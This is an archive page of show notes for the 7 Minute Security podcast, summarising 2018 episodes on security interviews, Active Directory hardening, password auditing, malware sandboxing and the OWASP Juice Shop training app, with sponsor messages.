Admit some last minute mistakes that about made me quit the whole project

With the holidays coming up, this course is a perfect gift for that IT or security person in your life :-). Buy them a copy - or 10!

Psst! I will soon be getting a handful of vouchers to the course that I can give away to podcast listeners. Interested in one? Ping me and I'll draw names from a virtual hat in a few weeks!

7MS #330: Interview with Nathan Hunstad of Code42 Oct 03, 2018

In today's episode, I'm excited to be joined in the studio by Nathan Hunstad, Director of Security at Code42. Nathan and I had a great chat about Code42's new security offering called Code42 Forensic File Search, which helps IT and security teams figure out where files are located across their enterprise - even if the endpoints are offline. This functionality lends itself to a number of interesting use cases and helps answer questions such as:

"Does known malware have, or has it ever had, a foothold in our environment?"
"Has a particular crypto-mining agent been installed on our employees’ computers? Who has it now?"
"What endpoints have or had copies of our company’s most sensitive files?"
"What files did an employee download or delete in the months before resigning?"
"What non-sanctioned collaboration applications are present in our environment?"

After today's podcast, be sure to check out this great video of Nathan demonstrating the power of Code42 Forensic File Search live!

Also talked about in today's episode:

Implementing host-based firewalls - here's a great blog and video on it

I want to thank Code42 for their support of the 7 Minute Security podcast. It's a pleasure to work together with them to help companies be more secure!

7MS #329: Active Directory Security 101 Sep 27, 2018

Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin right in your browser here, and then try it in your environment free for 20 days! www.netwrix.com

Welcome! Today I'm kicking off a new miniseries all about the fundamentals of Active Directory security. Rather than try to pile all the info into show notes, I'm going to start pumping everything into a living/breathing GitHub gist so we're all on the same page as this miniseries develops further. So, please feel free to check out that gist here.

7MS #328: How to Succeed in Business Without Really Crying - Part 5 Sep 19, 2018

This episode is a cavalcade of fun! Why?

First, I've got a big announcement: I've accepted a new position.

"What?!" exclaimed my mom. "I thought you were president of 7MS, what the what?"

No worries, it's business as usual, and my responsibilities at 7MS aren't changing. But I'm also going to start writing blogs, nurturing a Slack channel and producing a podcast for somebody else each week. Tune in to find out who!

Oh, and I also conclude this episode with a song from my band, Sweet Surrender. A few years ago we wrote a goofy song to start our shows called Sound Check, and in this episode, I wanted to debut the sequel to that song...called MANDATORY ENCORE. Enjoy.

7MS #327: Interview with John Strand Sep 13, 2018

Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin right in your browser here, and then try it in your environment free for 20 days! www.netwrix.com

Well I'm geeking out big time because today I chatted with John Strand of Black Hills Information Security, SANS instructing, Security Weekly, Active Countermeasures, RITA and more. Some people think he looks like Wash from Serenity or Steve the Pirate from Dodgeball, and others get upset when they learn he's not John Strand the male model.

I've followed John and his team's work since I got started in security, and they've been a huge inspiration for what I do at 7MS. If you're not watching the BHIS Webcasts stop what you're doing and subscribe now! They're all full of practical, hands-on security advice - often complemented by tools that are totally free!

Anyway, enjoy today's interview where John and I talk about how to make pentesters' jobs harder, and why he'd rather be a security advisor to Katy Perry than Donald Trump.

7MS #326: Interview with Ryan Manship and Dave Dobrotka Sep 06, 2018

Today's episode is brought to you by my friends at Dashlane, a fantastic password manager for you, your family and your business! Head to www.dashlane.com/7ms and use the code 7MS for 10% off a year of Dashlane Premium!

Today I'm super pumped to be joined by Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup. Both these guys lead red teams for a living and had a lot of great insight to share as it relates to:

The definition of "red teaming" and where it overlaps, if at all, with pentesting
Successfully running red team campaigns
Defending against a red team campaign
How to climb unclimbable walls
Is antivirus any good at stopping attackers?
The importance of 2FA and training your end-users
How to fool the "This email originated outside your organization" email banners
How to break into red teaming as a career
How to successfully break into a casino (or not)

Other links and things mentioned in today's show:

RedTeam Security's awesome YouTube video on breaking into the US power grid
If you're a red teamer and in the Twin Cities area (or willing to drive a bit), you definitely want to sign up for ArcticCon coming up on October 23-24 at the Optum World Headquarters. Head to the link and sign up - if there are seats left!

Once you listen to today's episode, please let me know if you'd like Ryan and Dave to come back for another interview. We were thinking it would be a blast to talk about the details of planning a red team engagement!

7MS #325: Integrating Pwned Passwords with Active Directory - Part 2 Aug 30, 2018

Today's episode is a follow-up to #304 where we talked about how you can integrate over 500 million weak/breached/leaked passwords form Troy Hunt's Pwned Passwords into your Active Directory.

To get started with this in your environment, grab Troy's updated passwords list here, and then you can check out my BPATTY site for step-by-step implementation instructions.

The big "gotchas" I discuss in today's episode are:

If users update their password to something on the Pwned Passwords list, they'll see the generic "Your password didn't meet policy requirements" message. In other words, the message they'll see is no different than when they pick a password that doesn't meet the default domain policy. So be careful! I'd recommend training the users ahead of pulling the trigger on Pwned Passwords.
If you want to take, for example, just the top 100 words off of Troy's list and start your implementation off with a small list with:

Get-Content ".\pwnedpasswords.txt" | select -First 100

As it relates to "hard coding" a machine to point to a specific domain controller, this site has the technique I used. Is there a better way?

7MS #324: How to Succeed in Business Without Really Crying - Part 4 Aug 23, 2018

It's been a while so I thought I'd update you on how things are going on the business front. Here are the big updates I want to share with you in today's episode:

A new 7MS hire that's going to hunt sales opportunities!
My approach to finding podcast sponsors (it seems to be working)
Some kick-butt interviews that are on the horizon (including the one and only JOHN STRAND!)

Lots of goodies to share today!

7MS #323: 7 Ways to Not Get Hacked Aug 16, 2018

I'm putting together a general security awareness session aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to broil this list down to 7 key things to focus on. Here's my list thus far:

Passwords
2FA/MFA
Wifi (put a good password on it, don't use WEP, don't use WPS
Sign up for HaveIBeenPwned
Update all the things
Block malware/mining with browser plugins
Security awareness training

What do you think? Anything I missed or should consider swapping with another topic? Contact me!

7MS #322: My First Live Radio Interview Aug 09, 2018

I had an exhilarating and terrifying experience this week doing my first ever live radio interview!

As a quick bit of background, this interview was part of the 7MS radio marketing campaign that I've talked about my "How to Succeed in Business Without Really Crying" series (here's part 1, 2 and 3).

The interview was conducted by Lee Michaels, and though my heart was pounding for the first few minutes, it quickly became fun as Lee and I talked about picking good passwords, securing wifi, talking to your kids about safe online behaviors, and more.

7MS #321: Interview with Joe Klein - Part 2 Aug 01, 2018

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

Today's episode is a follow-up interview with Joe Klein, who is my good pal, a former coworker, and a SOC analyst extraordinaire. You might remember Joe from things such as...this podcast - episode #290 to be exact.

When we last left Joe, he had just started an exciting new journey as a SOC analyst, and also picked up a new sweet gig teaching college-level security courses. So Joe and I sat down last week in the 7 Minute Security studios to talk with Joe about:

How to be an absolute beast at networking
Seizing new opportunities (even if it seems scary)
Good certs for security newbs (and not-so-newbs) to pursue
Life as a SOC analyst
How to learn security by teaching it!

This interview was an absolute blast to work on with Joe, and after it was over, neither of us could believe that the run time was nearly 2 hours! So in order to help you navigate the episode and have the best listening experience possible, we created the following "Choose Your Own Adventure" timeline with the high (and low?) discussion points of the interview. Enjoy!

(Interview timeline available on 7MS under episode #321)

7MS #320: Interview with Lane Roush of Arctic Wolf Jul 25, 2018

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

This week I sat down with Lane Roush of Arctic Wolf to discuss the big hairy beast that is...(insert dramatic music here) logging and alerting! I work with a lot of clients (and you probably do too) who want answers to these questions:

What in the world is going on in my network?
How will I know if bad stuff is happening?
If I do identify the bad stuff and attempt to eradicate it, how will I know if I've exorcised all the demons?

So Lane and I sat down to discuss this conundrum, and explore answers to other burning questions like:

Why is it so hard to separate the signal from noise when trying to figure out what's happening in the bowels of your network?
Should logging/alerting be a full-time job for one or more people?
When does it make sense to outsource these responsibilities?

Check out today's interview to learn more, and also reach out to Arctic Wolf on their Twitter or LinkedIn for more information.

7MS #319: Sniper and Firewalls Full of FUD Jul 20, 2018

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

In today's episode, I talk about my fun experience using the Sn1per automated pentesting tool. It's really cool! It can scan your network, find vulnerabilities and exploit them - all in one swoop! It also does a nice one-two punch of OSINT+recon if you feed it a domain name.

And, I tell a painful story about how a single checkbox setting in a firewall cost me a lot of hours and tears. You can LOL at me, learn from my pain, and we'll all be better for it.

7MS #318: Interview with Bjorn Kimminich of OWASP Juice Shop Jul 11, 2018

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

This week's show is another interview episode - this time with my pal Bjorn Kimminich of the OWASP Juice Shop.

If you've never heard of the Juice Shop before, it's the world's most secure (and I mean that sarcastically) online shopping experience. Actually, it's chock full of security issues, which makes it a fantastic learning tool for Web app pentesters, be they seasoned or total newbs. Bjorn and I sat down (over Skype) to discuss:

How the Juice Shop came to be
The current status of application security (is it getting any better?!)
Common vulnerabilities still found in today's Web apps
Juice Shop being featured in Google's Summer of Code
How dev teams can better bake security into their products
What's next for the Juice Shop (hint: stay tuned after the episode is over for a hint on one new "feature")

Bjorn has gone to great lengths to provide documentation about how to get up and running with a copy of the Juice Shop to begin your hacking. Personally I find it dead simple to follow Bjorn's instructions for spinning up a Docker container:

docker pull bkimminich/juice-shop docker run --rm -p 3000:3000 bkimminich/juice-shop

Should you find the Juice Shop to be a valuable tool, please be sure to ping Bjorn on Twitter to let him know.

Be sure to follow the Juice Shop on Twitter as well. Psst...this account sometimes tweets coupon codes which can help you unlock certain challenges!

7MS #317: Interview with Justin McCarthy of StrongDM Jul 05, 2018

Today's interview features Justin McCarthy, CTO and cofounder of StrongDM, which offers both commercial and open source tools (like Comply) to help customers with SOC compliance.

Justin schooled me (in a nice way) about a lot of things, including:

What SOC and the various SOC types are all about
What SOC compliance costs
What to look for in selecting a good auditor
Tools that can help companies make SOC compliance efforts go more smoothly

7MS #316: How to Succeed in Business Without Really Crying - Part 3 Jun 28, 2018

In this episode I wanted to give you some cool/fun updates as it relates to 7MS the business! Specifically:

A new member of the 7MS team (kinda!)
The weird and varied projects I'm working on
Upcoming podcast sponsors (probably in July)
7MS has a "real" office coming soon to the southern metro of MN (hopefully!)

7MS #315: Creating a Personal DR Plan - Part 2 Jun 21, 2018

As a continuation of last week's episode I'm now making a bit of progress in finding a good backup solution that protects USB backups both at rest and when pumped up to the cloud.

I mentioned I've been using BackBlaze for backups (not a sponsor), and they allow you to backup USB drives as long as they're connected at least once every 30 days. That's cool. However, many of my USB drives are not encrypted, and I want to protect myself in the off chance that someone breaks in and steals all my stuff while those unencrypted drives are connected.

My BackBlaze backup PC is just a little dinky box running Windows 10 Home, so I don't have access to BitLocker. I was gonna drop the ~$100 for the Windows 10 Pro upgrade, but I coincidentally was doing an endpoint security product evaluation at the same time, and so I grabbed a copy of ESET's DESLock (also not a sponsor) because it was on sale. Where I'm stuck now is that the USB drives are unlocked, and yet for some reason BB can't properly back them up. I've got a ticket into their support folks, and will update you once we get to part 3 of this miniseries.

7MS #314: Creating a Personal DR Plan Jun 13, 2018

You probably create DR plans for your business (or help other companies build them), but have you thought about creating one for yourself? Yeah, I know it's grim to think about "What will my loved ones do to get into my accounts, backups, photos, social media accounts..." but it's probably not a bad idea to prepare for that (spoiler alert: we all die at some point).

Today I talk about how I'm beginning to build such a plan so my wife can take over for my/our online accounts. This plan includes:

A "here's how I run all our technology" Google doc with domains I have registered, their expiration date, what their function is, etc.
A how-to guide on restoring data from our online backup solution
Implementation of a password manager

7MS #313: Push-Button Domain Admin Access Jun 07, 2018

As I was preparing for my Secure 360 talk a month or so ago, I stumbled upon this awesome article which details a method for getting Domain Admin access in just a few minutes - without cracking passwords or doing anything else "loud." The tools you'll need are:

I've written up all the steps in a gist that you can grab here. Enjoy!

7MS #312: OFF-TOPIC - Boxing a Cat May 30, 2018

It has been a heck of a week (in a good way), and I'm taking a break from security so you can help me untangle a mystery that's been wrapped around my brain for years. I need you to help me figure out what this dude meant when he said that something was as frustrating "as boxing a cat."

P.S. if you hate off-topic episodes no worries! We'll be back to our regularly scheduled security program next week!

7MS #311: How to Build a Cuckoo Sandbox May 24, 2018

This week I dove into building a Cuckoo Sandbox for malware analysis. There are certainly a ton of posts and videos out there about it, but this entry called Painless Cuckoo Sandbox Installation caught my eye as a good starting point.

This article got me about 80% of the way there, and the last 20% proved to be problematic. I got some additional answers from the Cuckoo documentation but still left some answers to be desired.

Through a lot of Googling, banging my head against the wall and looking at the GitHub issues list, I finally got everything working.

I've taken my entire build process and included it as a gist here. Enjoy!

7MS #310: Secure the Radio Commercials May 18, 2018

Last week I was in the recording studio to record three 7MS commercials aimed at churches. The goal was to educate them on some security topics and close with a "hook" to contact 7MS for help securing your church.

The commercials themselves are embedded in this episode so please have a listen and let me know what you think! I'll also let you know (via the podcast) when these commercials hit the air. It's likely the station won't air in your area, but you can catch it on the interwebs if you so desire (thanks again for your support, mom).

7MS #309: Password Cracking in the Cloud - Part 2 May 09, 2018

Cracking passwords in the cloud is super fun (listen to last week's episode to learn how to build your own cracking box on the cheap at Paperspace)!

In the last couple weeks, customers have asked me about doing a password strength assessment on their Active Directory environment. I asked around and read a bunch of blogs and found a method that I think:

Extracts the hashes safely
Parses down the dump to contain only the hashes (so that if somebody popped my Paperspace cloud-crackin' box, they'd have just a list of half-cracked hashes and that's it)
Does the work pretty automagically

I talk about this in more detail in today's podcast, and here's the gist you can follow with all the necessary commands to get AD crackin'!

7MS #308: Password Cracking in the Cloud May 02, 2018

I had an absolute ball this week trying to figure out how to crack passwords effectively, and on the cheap, and in the cloud. Today's episode goes into much more detail, and embedded below is the Gist of my approach thus far. If you've got things to add/suggest to this document, let me know!

P.S. if you don't see the gist because you're reading this in a podcast-catching app, head to https://7ms.us and look up today's episode and you'll see the gist in all its gisty glory!

7MS #307: Writing Security-Focused Radio Commercials Apr 25, 2018

Hey, so this week I am without my main machine - thus no jingle or "jungle boogie" intro music. Feels weird. Feels real weird.

Anyway, ya know how I teased last week that 7MS could possibly be coming to a radio station near you? Well I think it's more of a probability than a possibility at this point!

I met with a radio exec a few weeks ago and we talked about:

Lots of people still listen to the radio (who knew?)
Creating a "security minute" spot that would lead to a commercial about 7MS
How to write a good commercial "hook"
It's difficult to write a 60-second commercial!
Targeted advertising at churches, which is an under-served market when it comes to infosec
Writing a new (shortened) 7MS jingle

Our TOPPODCAST Picks

Follow Us

Stay Connected